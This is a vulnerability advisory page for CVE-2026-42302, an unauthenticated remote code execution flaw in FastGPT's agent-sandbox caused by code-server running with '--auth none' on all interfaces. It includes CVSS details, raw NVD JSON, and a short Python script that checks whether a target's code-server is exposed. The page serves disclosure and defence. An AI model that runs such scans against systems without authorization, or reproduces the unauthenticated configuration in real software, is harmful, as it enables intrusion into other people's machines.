Security Vulnerability Report
中文
CVE-2026-42302 CVSS 9.8 CRITICAL

CVE-2026-42302

Published: 2026-05-08 23:16:37
Last Modified: 2026-05-08 23:16:37
Source: [email protected]

Description

FastGPT is an AI Agent building platform. From version 4.14.10 to before version 4.14.13, the agent-sandbox component of FastGPT is vulnerable to unauthenticated Remote Code Execution (RCE). The startup script entrypoint.sh initializes code-server with the --auth none flag and binds the service to all network interfaces (0.0.0.0:8080). This configuration allows any user with network access to the port to bypass authentication and gain full control over the sandbox environment. This issue has been patched in version 4.14.13.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FastGPT >= 4.14.10
FastGPT < 4.14.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Proof of Concept for CVE-2026-42302 # Checks if the code-server is accessible without authentication target = "http://<target-ip>:8080" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } def check_vulnerability(): try: # Accessing the root endpoint of code-server response = requests.get(target, headers=headers, timeout=5) # If auth is none, it usually returns 200 or 302 to the IDE interface # Check for specific content indicating code-server is running if response.status_code == 200 and "code-server" in response.text: print("[+] Target is vulnerable to CVE-2026-42302.") print("[+] Code-server is accessible without authentication.") print("[+] RCE possible via Web Terminal at: {}".format(target)) else: print("[-] Target does not appear to be vulnerable or service is down.") except requests.RequestException as e: print("[-] Connection error: {}".format(e)) if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42302", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:36.640", "lastModified": "2026-05-08T23:16:36.640", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "FastGPT is an AI Agent building platform. From version 4.14.10 to before version 4.14.13, the agent-sandbox component of FastGPT is vulnerable to unauthenticated Remote Code Execution (RCE). The startup script entrypoint.sh initializes code-server with the --auth none flag and binds the service to all network interfaces (0.0.0.0:8080). This configuration allows any user with network access to the port to bypass authentication and gain full control over the sandbox environment. This issue has been patched in version 4.14.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/labring/FastGPT/commit/9d1cafce9241430fb5bcdd646455055c5f4ae0a4", "source": "[email protected]"}, {"url": "https://github.com/labring/FastGPT/pull/6781", "source": "[email protected]"}, {"url": "https://github.com/labring/FastGPT/releases/tag/v4.14.13", "source": "[email protected]"}, {"url": "https://github.com/labring/FastGPT/security/advisories/GHSA-34rc-438g-7w78", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.